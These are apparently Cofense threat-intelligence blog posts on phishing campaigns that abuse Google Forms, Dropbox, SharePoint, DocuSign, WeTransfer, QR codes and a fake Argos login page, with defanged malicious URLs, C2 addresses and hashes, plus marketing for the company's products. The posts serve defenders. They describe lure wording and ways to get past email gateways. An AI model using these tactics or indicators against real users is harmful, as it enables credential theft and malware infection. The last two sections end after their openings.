Phishers Are Using Google Forms to Bypass Popular Email Gateways

By Kian Mahdavi

Over the past couple of weeks, the Cofense Phishing Defense Center (PDC) has witnessed an increase in phishing campaigns that aim to harvest credentials from innocent email recipients by tricking them into ‘Updating their Office 365’ using a Google Docs Form.

Google Docs is a free web-based application, allowing people to create text documents and input and collect data. It is an enticing way for threat actors to harvest credentials and compromise accounts. Here’s how it works:

Figure 1 – Email Header

The phishing email originates from a compromised financial email account with privileged access to CIM Finance, a legitimate financial services provider. The threat actor used the CIM Finance website to host an array of comprised phishing emails. Since the emails come from a legitimate source, they pass basic email security checks such as DKIM and SPF. As seen from the headers above in figure 1, the email passed both the DKIM authentication check and SPF.

This threat actor set up a staged Microsoft form hosted on Google that provides the authentic SSL certificate to entice end recipients to believe they are being linked to a Microsoft page associated with their company. However, they are instead linked to an external website hosted by Google, such as

hXXps://docs[.]google[.]com/forms/d/e/1FAIpQLSfzgrwZB23BXv6vumZljSGg0mUuYP4UcafmShTpUzWJoYzBPA/viewform.

Figure 2 – Email Body

The email masquerades as a notification from “IT corporate team,” informing the business user to “update your Office 365” that has supposedly expired. The “administrator” claims immediate action must be taken or the account will be placed on hold. The importance of email access is key to this credential phish, leading users to panic and click on the phishing link, providing their credentials.

Figure 3 – Phishing Page

Upon clicking the link, the end user is presented with a substandard imitation of the Microsoft Office365 login page, as seen in figure 3, that does not follow Microsoft’s visual protocol. Half the words are capitalized, and letters are replaced with asterisks; examples include the word ‘email’ and the word ‘password.’ In addition, when end users type their credentials, they appear in plain text as opposed to asterisks, raising a red flag the login page is not real. Once the user enters credentials, the data is then forwarded to the threat actors via Google Drive.

 

Network IOC IP
hXXps://docs[.]google[.]com/forms/d/e/1FAIpQLSfzgrwZB23BXv6vumZljSGg0mUuYP4UcafmShTpUzWJoYzBPA/viewform 172[.]217[.]7[.]238

 

HOW COFENSE CAN HELP

75% of threats reported to the Cofense Phishing Defense Center are credential phish. Protect the keys to your kingdom—condition end users to be resilient to credential harvesting attacks with Cofense PhishMe through the “Account Security Alert” or “Cloud Login” templates and get visibility of attacks with Cofense Reporter.

Quickly turn user reported emails into actionable intelligence with Cofense Triage. Reduce exposure time by rapidly quarantining threats with Cofense Vision.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence. Cofense Intelligence customers received further information about this threat in Active Threat Report (ATR) 36388.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog, are registered trademarks or trademarks of Cofense Inc.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Raccoon Stealer Found Rummaging Past Symantec and Microsoft Gateways

By Max Gannon and Alan Rainer, Cofense IntelligenceTM

Threat actors continue to exploit legitimate services to trick users, as seen in the latest campaign using Raccoon Stealer malware, aimed at a financial organization and delivered by a Dropbox-hosted .IMG file. A rather unsophisticated malware, Raccoon Stealer came to light around April 2019, bypassing Symantec Email Security and Microsoft EOP gateways. The malware is sold on underground forums in both Russian and English, features an easy-to-use interface, around-the-clock customer support, and highly active development. Users of the malware can distribute it in any way they deem fit. In this campaign, the actors chose to host the malicious .IMG file on a Dropbox share, which upon execution, drops Raccoon Stealer onto the victim machine.

The email used in this campaign was delivered to the inbox of an employee of a financial institution. Figure 1 shows the email signature and originator address which probably belong to a compromised user. Using the familiar theme of a wire transfer—closely akin to those often seen in Business Email Compromise (BEC) scams—the threat actors look to trick users into opening the Dropbox URL and downloading the malicious file.

Educating users on spotting these types of scams and carefully scrutinizing emails that originate outside the organization are great ways to thwart this threat. Cofense IntelligenceTM Indicators of Compromise (IOCs) provided via our feed and noted in the appendix below can be used to fortify network defense and endpoint protection solutions.

Technical Findings

In the past, CofenseTM has seen Raccoon Stealer delivered by direct attachments and via RTF documents leveraging CVE-2017-8570 that targeted sectors such as utilities. In this most recent campaign, a potentially compromised email account was used to send the email shown in Figure 1, which managed to make its way past Symantec Email Security and Microsoft EOP gateways without the URL being removed or tampered with to the extent that it would prevent victims from clicking on it and downloading the payload.

Figure 1: Email delivering Dropbox URL

Raccoon Stealer is a relatively new malware that first appeared on the market around April 2019. Due to Raccoon Stealer’s ease of use and range of capabilities that allow for quick monetization of infected users, it is becoming increasingly popular. Although not particularly advanced or subtle with its network activity and processes, the malware can quickly gather and exfiltrate data as well as download additional payloads.

Initial contact with the command and control center (C2) is made when the malware does an HTTP POST that includes the “bot ID” and “configuration ID”. The C2 location responds with a JSON object explicitly including C2 data and payload locations for libraries and additional files, as shown in Figure 2.

Figure 2: Configuration Data From C2

The payload URLs currently deliver a set of DLLs, as specified by the “attachment url” and “libraries” parameters, but future development could easily allow threat actors to use Racoon Stealer as a loader for other malware to generate additional income.

The use of several distinct delivery methods in a relatively short time, including via the Fallout Exploit Kit, may indicate increased usage by numerous threat actors as predicted in prior Cofense research. Given the variety of delivery options, Racoon Stealer could be a problem for organizations that focus too much on one infection vector.

Table 1: Indicators of Compromise

Description

Indicator

Dropbox URL

hXXp://www[.]dropbox[.]com/s/g6pz8dm4051rs0o/SCAN%20DOC[.]IMG?dl=1

Raccoon Stealer C2 Locations

34[.]89[.]185[.]248

hXXp://34[.]89[.]185[.]248/file_handler/file[.]php hXXp://34[.]89[.]185[.]248/gate/libs[.]zip hXXp://34[.]89[.]185[.]248/gate/log[.]php hXXp://34[.]89[.]185[.]248/gate/sqlite3[.]dll

Raccoon Stealer Hashes

SCAN DOC.exe             f7bcb18e5814db9fd51d0ab05f2d7ee9

SCAN DOC.IMG            0c8158e2a4267eea51e12b6890e68da8

HOW COFENSE CAN HELP

Cofense PhishMeTM Offers a simulation template, “Dropbox Wire Transfer – Raccoon Stealer,” to educate users on the phishing tactic described in today’s blog.

Cofense IntelligenceTM: ATR IDs 32407, 31881, 31977

Cofense TriageTM: PM_Intel_Raccoon_31881, PM_Intel_Raccoon_31977

100% of malware-bearing phishing threats analyzed by the Cofense Phishing Defense CenterTM were reported by end users. 0% were stopped by technology. Condition users to be resilient to evolving phishing attacks with Cofense PhishMeTM and remove the blind spot with Cofense ReporterTM.

Quickly turn user reported emails into actionable intelligence with Cofense TriageTM. Reduce exposure time by rapidly quarantining threats with Cofense VisionTM.

Easily consume phishing-specific threat intelligence to proactively defend your organization against evolving threats with Cofense Intelligence TM.

Thanks to our unique perspective, no one knows more about REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Phishing Emails Are Using SharePoint to Slip Past Symantec’s Gateway and Attack Banks

Hiding in plain sight by using trusted enterprise technologies almost guarantees delivery of a phishing URL. Case in point: a phishing campaign that delivered a legitimate Sharepoint URL to bypass the email gateway, in this case Symantec’s. Here’s how this increasingly popular phishing tactic works.

Email Body

The phishing email is sent from a compromised account at a third-party vendor asking the recipient to review a proposal document. The recipient is urged to click on an embedded URL. As seen below in figure 1, the URL has been wrapped by Symantec’s Click-time URL Protection and redirects the recipient to a compromised SharePoint account. SharePoint, the initial delivery mechanism, then delivers a secondary malicious URL, allowing the threat actor to circumvent just about any email perimeter technology.

Figure 1: email body

The embedded URL in the email body delivers the recipient to a compromised SharePoint site where a malicious OneNote document is served. The document is illegible and invites the recipient to download it by clicking on yet another embedded URL, which leads to the main credential phishing page.

Figure 2: Malicious OneNote Document

Phishing Page

The phishing page is a cheap imitation of the OneDrive for Business login portal. There, the recipient is given two options to authenticate, with their O365 Login credentials or by choosing to login with any other email provider. We see this tactic quite often as it increases the chances that the recipient will log in.

Figure 3: Phishing Pages

When we download the files from the compromised server, we can see that the credentials from the phishing form are posted by login.php. Login.php posts the harvested credentials to a Gmail account.

Figure 4: Login.php

Other files harvested from the compromised server shed light on the origin of this attack. Below is a readme file that instructs the operator on how to configure and install the phishing page onto a compromised webserver. We have also identified that this phishing exploit kit is part of a series of “Hacking tools” built and sold by BlackShop Tools.

Figure 5: readme.txt

IOCs:

Malicious URL(s):

hxxps://botleighgrange-my[.]sharepoint[.]com/:o:/p/maintenance/EngTNCs22_REkaJY4gVf9lwBqkwYFtDSmJJ7L2H-AnoDQg?e=tgtauL
hxxps://alblatool[.]com/xxx/one/
hxxps://alblatool[.]com/xxx/one/office365/index[.]php

Associated IP(s):

13[.]107[.]136[.]9
198[.]54[.]126[.]160

 

HOW COFENSE CAN HELP

To defend against the attack described in today’s blog, Cofense offers:

 

75% of threats reported to the Cofense Phishing Defense CenterTM are credential phish. Protect the keys to your kingdom—condition end users to be resilient to credential harvesting attacks with Cofense PhishMe.

Over 91% of credential harvesting attacks bypassed secure email gateways. Remove the blind spot—get visibility of attacks with Cofense ReporterTM.

Quickly turn user-reported emails into actionable intelligence with Cofense Triage. Reduce exposure time by rapidly quarantining threats with Cofense VisionTM.

Attackers do their research. Every SaaS platform you use is an opportunity for attackers to exploit it. Understand what SaaS applications are configured for your domains—do YOUR research with Cofense CloudSeekerTM.

Thanks to our unique perspective, no one knows more about the REAL phishing threats than Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

Updated Sep. 12

This Phish Uses DocuSign to Slip Past Symantec Gateway and Target Email Credentials

By Tej Tulachan

The Cofense Phishing Defense CenterTM has observed a new wave of phishing attacks masquerading as an email from DocuSign to target the credentials of all major email providers. DocuSign is an electronic signature technology that facilitates exchanges of contracts, tax documents, and legal materials. Threat actors utilize this legitimate application to bypass the email gateway and entice users into handing out their credentials. Here’s how it works.

Email Body

At first glance, the email body looks well-presented with the correct DocuSign logo and its content. However, there is something suspicious within the first line of the message—the absence of the recipient’s name, just “Good day.” If we look deeper into the message body, we can see that there is an embedded hyperlink which directs to hxxps://ori8aspzxoas[.]appspot[.]com/gfi8we/

Figure.1

Email Header

From the email header we can see that the threat source originates from the domain narndeo-tech[.]com. Further investigation reveals it belongs to Hetzner Online GmbH which is a well-known hosting company based in Germany. We noted that there is no sign of proof this came from a genuine DocuSign domain.

From: Lxxxx Mxxx <xxxxxx22@narndeo-tech[.]com>

To: R______ L_______ <unsuspecting.victim@example.com>

Message-ID: <20190716055127.3AEBF4689BD125B3[@]narndeo-tech[.]com>

Subject: New Docu-Sign

X-Env-Sender: lesliemason22[@]narndeo-tech[.]com

Phishing Page

When users click on the embedded link, it redirects to a phishing page as shown below in figure 2. Here the attacker gives six separate options for users to enter their credentials to access the DocuSign document, increasing the likelihood this phisher gets a bite.

Figure.2

Once the user clicks on the given option, it redirects to the main phishing page as shown below in three versions, Office 365, Gmail, and iCloud.

Figure.3

Email Gateway: This threat was found in an environment running Symantec EmailSecurity.Cloud.

Conclusion:  

IOC

hxxps://ori8aspzxoas[.]appspot[.]com/gfi8we/

108[.]177[.]111[.]153

Recommendation:

Cofense™ cautions its customers to be wary of emails containing suspicious links or attachments. Specific to this sample, we recommend that customers be observant for emails that instruct users to provide their credentials. If your organization uses DocuSign as part of its business processes, remind users how they should expect legitimate notifications according to your internal standards. Cofense PhishMe™ customers may consider launching simulations that follow this style of attack to further train their users to detect and report suspicious emails.  A simulation template is available as “Completed Document,” which is based on a real phishing campaign. We also have existing newsletter (Announcement) content available to send to your users.

Reference: https://www.docusign.com/sites/default/files/Combating_Phishing_WP_05082017.pdf

HOW COFENSE CAN HELP

75% of threats reported to the Cofense Phishing Defense CenterTM are credential phish. Protect the keys to your kingdom—condition end users to be resilient to credential harvesting attacks with Cofense PhishMeTM.

Over 91% of credential harvesting attacks bypassed secure email gateways. Remove the blind spot—get visibility of attacks with Cofense ReporterTM.

Quickly turn user-reported emails into actionable intelligence with Cofense TriageTM.

Reduce exposure time by rapidly quarantining threats with Cofense VisionTM.

Attackers do their research. Every SaaS platform you use is an opportunity for attackers to exploit it. Understand what SaaS applications are configured for your domains—do YOUR research with Cofense CloudSeekerTM.

Thanks to our unique perspective, no one knows more about REAL phishing threats than  Cofense. To understand them better, read the 2019 Phishing Threat & Malware Review.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.

Phishing Attackers Are Abusing WeTransfer to Evade Email Gateways

By Jake Longden

The Cofense Phishing Defense Center has observed a wave of phishing attacks that utilize the legitimate file hosting site WeTransfer to deliver malicious URLs to bypass email gateways. The attacks span major industries like banking, power, and media. Here’s how they work.

Email Body:

The email body is a genuine notification from WeTransfer which informs the victim that a file has been shared with them. The attackers utilise what appears to be compromised email accounts to send a genuine link to a WeTransfer hosted file. As these are legitimate links from WeTransfer, this allows them to travel straight through security checks at the gateway.

WeTransfer allows for the addition of a note to the email to clarify why the file was sent. Here, the threat actor will often write a note stating that the file is an invoice to be reviewed. This is a commonly observed phishing technique to pique the user’s interest.

Fig 1. Email body

Phishing Page:

When the user clicks on the “Get your files” button in the message body, the user is redirected to the WeTransfer download page where a HTM or HTML file is hosted and thus downloaded by the unsuspecting victim. When the user opens the .html file, he or she is redirected to the main phishing page.

Fig 2. WeTransfer Hosted file

In the final stage of the attack, victims are asked to enter their Office365 credentials to login. More often than not, we see a Microsoft Service being targeted, however we have observed other targeted brands.

Fig 3. Phishing Page

Gateway Evasion

As WeTransfer is a well-known and trusted file hosting system, used to share files too large to attach to an email, these links will typically bypass gateways as benign emails, unless settings are modified to restrict access to such file sharing sites. The PDC has observed this attack method to bypass multiple gateways. These include ProofPoint, Office365 Safe Links,  and Symantec.

Useful Resources for Customers

Description
Triage Yara rule: PM_WeTransfer_File_Download
PhishMe Templates: “File Transfer”
Cofense Intelligence: https://www.threathq.com/p42/search/default#m=26412&type=renderThreat 


Other Ways Cofense Can Help

The Cofense Phishing Defense Center identifies active phishing attacks in enterprise environments. Learn how our dedicated experts provide actionable intelligence to stop phishing threats.

75% of threats reported to the Cofense Phishing Defense Center are credential phish. Protect the keys to your kingdom—condition end users to be resilient to credential harvesting attacks with Cofense PhishMeTM.  Our solution offers a phishing simulation to protect against file-transfer attacks like the one described in this blog.

According to the Cofense Phishing Defense Center, over 91% of the credential harvesting attacks they identify bypassed email gateways. Remove the blind spot—get visibility of attacks with Cofense ReporterTM.

Quickly turn user reported emails into actionable intelligence with Cofense TriageTM. Reduce exposure time by rapidly quarantining threats with Cofense VisionTM.

Attackers do their research. Every SaaS platform you use is an opportunity for attackers to exploit it. Understand what SaaS applications are configured for your domains—do YOUR research with Cofense CloudSeeker.

Thanks to our unique perspective, no one knows more about current REAL phishing threats than Cofense. To raise your understand, read the 2019 Phishing Threat & Malware Review.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.

Under the Radar – Phishing Using QR Codes to Evade URL Analysis

Phishing attacks evolve over time, and attacker frustration with technical controls is a key driver in the evolution of phishing tactics.

In today’s modern enterprise, it’s not uncommon for our emails to run the gauntlet of security products that wrap or scan embedded URLs with the hope of finding that malicious link. Products like Proofpoint URL Defense, Microsoft Safe Links, and Mimecast URL Protect hope to prevent phishing attacks by wrapping or analyzing URLs.  These technologies can only be effective IF they can find the URLs in the first place.

Fast forward to this week where our Phishing Defense Center™ stopped a phishing campaign aimed at customers in Finance. The analysis below outlines the attacker’s use of a URL encoded in a QR code to evade the above-named technologies.  While you’ve probably seen QR codes in your everyday life, this might be the first time you are seeing QR codes used as a phishing tactic.

The Phish:

The email itself is relatively simple. It poses as a pseudo SharePoint email with the subject line: “Review Important Document”. The message body invites the victim to: “Scan Bar Code To View Document”. The only other visible content is a tantalizing QR code that a curious user may be tempted to scan.

Figure 1, Email Body

The message body in plain text consists of several basic HTML elements for styling and an embedded .gif image file of the QR code. Very basic, but very effective.

When the QR code is decoded we can see that that it contains a phishing URL: hxxps://digitizeyourart.whitmers[.]com/wp-content/plugins/wp-college/Sharepoint/sharepoint/index.php

Most smartphone QR code scanner apps will instantly redirect the user to the malicious website via the phone’s native browser. In this case the victim would be redirected to a SharePoint branded phishing site. The victim is then confronted with options to sign in with AOL, Microsoft, or “Other” account services. While this sounds like a simple phish, there is a more nefarious tactic in play: removing the user from the security of a corporate business network.

Figure 2, Phishing site

Standard Security Controls Circumvented:

By enticing the victim to pull out their smartphone and scan the QR code the attacker manages to evade standard corporate security controls. Secure email gateways, link protection services, sandboxes, and web content filters no longer matter because the user is now interacting with the phishing site in their own security space: their mobile phone. And yes, the phishing site is optimized for mobile viewing. Here’s a glance at what the site looks like on a smartphone:

Figure 3, Phishing page viewed on phone

Though the user may now be using their personal device to access the phish, they are still in the “corporate” mindset as the original email was received at their business email address. Therefore, it is highly likely that the victim would input their corporate account credentials to attempt to access this “document”. 

Gateway Evasion:

This attack was observed passing through an environment utilizing Symantec Messaging Gateway. When scanned, the message was deemed “Not spam” by the system as seen in Fig 4 below.

Figure 4, Email Header Snippet

Conclusion:

In the past QR codes were reserved for geeks on the bleeding edge of technology. Today we interact with QR codes more and more as we cut the cord on cable, setup home internet devices, transact crypto currencies, etc…  Will QR codes be a common phishing tactic of the future? Time will tell.  But THIS phishing attack that snuck past best in class phishing technologies was only stopped by an informed, in tune human, who reported it with Cofense Reporter ™ , so that their security teams could stop it.

Today over 90% of phishing threats observed by the Cofense Phishing Defense Center ™ bypassed secure email gateways. Condition users to be resilient to evolving phishing attacks with Cofense PhishMe ™ and remove the blind spot with Cofense Reporter.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.

Phishing Attacks on High Street Target Major Retailer

By Jake Longden

The Cofense Phishing Defense Center™ has observed a phishing campaign that purports to be from Argos, a major retailer in the UK and British High Street. During 2018, Argos was the subject of a large number of widely reported phishing scamsi; this threat specifically targets Argos customers for their personal information and looks like a continuation of what was seen last year.

With the goal of stealing your store credit card and login information, here’s how it works:

All third-party trademarks referenced by Cofense™ whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.

Fig 1. Email Body

Email Body:

The message itself follows a standard phishing template to inform the user that their account has been restricted and that user sign in is required for verification. The use of bad grammar and typos are a dead giveaway that this email communication is not genuine.

Message body in plain text:

In reviewing the body of the email, we see the hyperlink for “Sign into your account” which directs the potential victim to: hxxps://www[.]argos[.]co[.]uk[.]theninja[.]gknu[.]com/www[.]argos[.]co[.]uk/account-login/

The attacker repeatedly used the string of the legitimate Argos site in the URL, both as part of the subdomains, and as a subdirectory. This was an attempt to mask the true source, and to lure the victim into trusting the legitimacy of the website.

Upon examination, we see that the link is wrapped by a URL filtering service.

href="hxxps://clicktime[.]symantec[.]com/3AuyExDNpRSjkQbgT2gXygH6H2?u=hxxps://www[.]argos[.]co[.]uk[.]theninja[.]gknu[.]com/www[.]argos[.]co[.]uk/account-login/" target="_blank" rel="noopener"><span class="ox-dad7652f0e-m_609589041267919212link-blue ox-dad7652f0e-m_609589041267919212MsoHyperlink ox-dad7652f0e-m_609589041267919212MsoHyperlinkFollowed">SIGN
INTO YOUR ACCOUNT

Fig 2. Email Body in Plain Text

 

Email Headers:

Analysis of the headers indicates that the “from” address is spoofed; the “reply to” field contains the address ‘no-reply[@]creativenepal[.]org’, which does not match ‘no-replays[@]multitravel.wisata-islam[.]com’.

Research on the ‘multitravel.wisata-islam’ domain failed to produce relevant data and reinforces the suspicion that the address is spoofed. At the time of analysis, we were unable to resolve an IP address, or load the domain.

From: <no-replays[@]multitravel[.]wisata-islam[.]com>
To: <xxxx.xxxxxx@xxxxxx.com>
Subject: [WARNING SUSPECTED SPAM]  [WARNING SUSPECTED SPAM]  Please make sure
 you complete the form correctly.
Thread-Topic: [WARNING SUSPECTED SPAM]  [WARNING SUSPECTED SPAM]  Please make
 sure you complete the form correctly.
Thread-Index: AQHVIXUk7CjiCOKjHEyntcvh4etMFg==
Date: Wed, 12 Jun 2019 23:18:17 +0000
Message-ID: <7d885f411da93272271ec8ad32e5064b@localhost.localdomain>
Reply-To: <“:no-reply”[@]creativenepal[.]org>

Fig 3. Email Headers

Phishing Page:

Once the user clicks on the “Sign into your account” hyperlink, they are redirected to a convincing imitation of the true Argos login page requesting the victims’ Username and Password.

This then leads the user to a second page, where the user is requested to supply details for their Argos store credit card account. This page follows the standard format for regular credit/debit cards with one key difference: the additional request for a ‘Card Amount’. This request is specific to the Argos Card as referenced in the copy: “The Argos Card lets you shop at Argos, with flexible payment plans that give you longer to pay” (see: https://www.argos.co.uk/help/argos-card/apply). This deviates from standard forms by asking the user for their credit limit.

 

 

Fig 4. Phishing Page

Gateway Evasion:

This campaign has been observed to pass through the ‘Symantec Messaging Gateway’.

We can see the influence of the Email gateway which injected ‘Warning Suspected Spam’ headers to the Subject Line and incorrectly presented this phish as a benign marketing email, and not a phishing attempt.

Conclusion:

To help protect against this type of credential phish, Cofense PhishMe™ offers a template called “Account Limitation.”

This credential phish eluded gateways and was actually mis-identified as harmless marketing spam. In fact 75% of threats reported to the Cofense Phishing Defense Center are Credential Phish. Protect the keys to your kingdom – condition end users to be resilient to Credential Harvesting attacks with Cofense PhishMe.

 

All third-party trademarks referenced by Cofense™ whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks.

i Google Search “Argos Data Breach 2018”

Houdini Worm Transformed in New Phishing Attack

By Nick Guarino and Aaron Riley

The Cofense Phishing Defense Center™ (PDC)  and Cofense Intelligence have identified a new variant of Houdini Worm targeting commercial banking customers with campaigns containing either URLs, .zip, or .mht files. This new variant is named WSH Remote Access Tool (RAT) by the malware’s author and was released on June 2, 2019. Within five days, WSH RAT was observed being actively distributed via phishing. Figure 1 shows an example message from this campaign.

The Zombie Phish Is Back with a Vengeance

Keep a close on your inboxes—the Zombie Phish is back and it’s hitting hard.

Last October, on the eve of Halloween, the CofenseTM Phishing Defense CenterTM reported on a new phishing threat dubbed the Zombie Phish. This phish spreads much like a traditional worm. Once a mailbox’s credentials have been compromised, the bot will reply to long-dead emails (hence, Zombie) in the inbox of the infected account, sending a generic phishing email intended to harvest more victims for the Zombie hoard.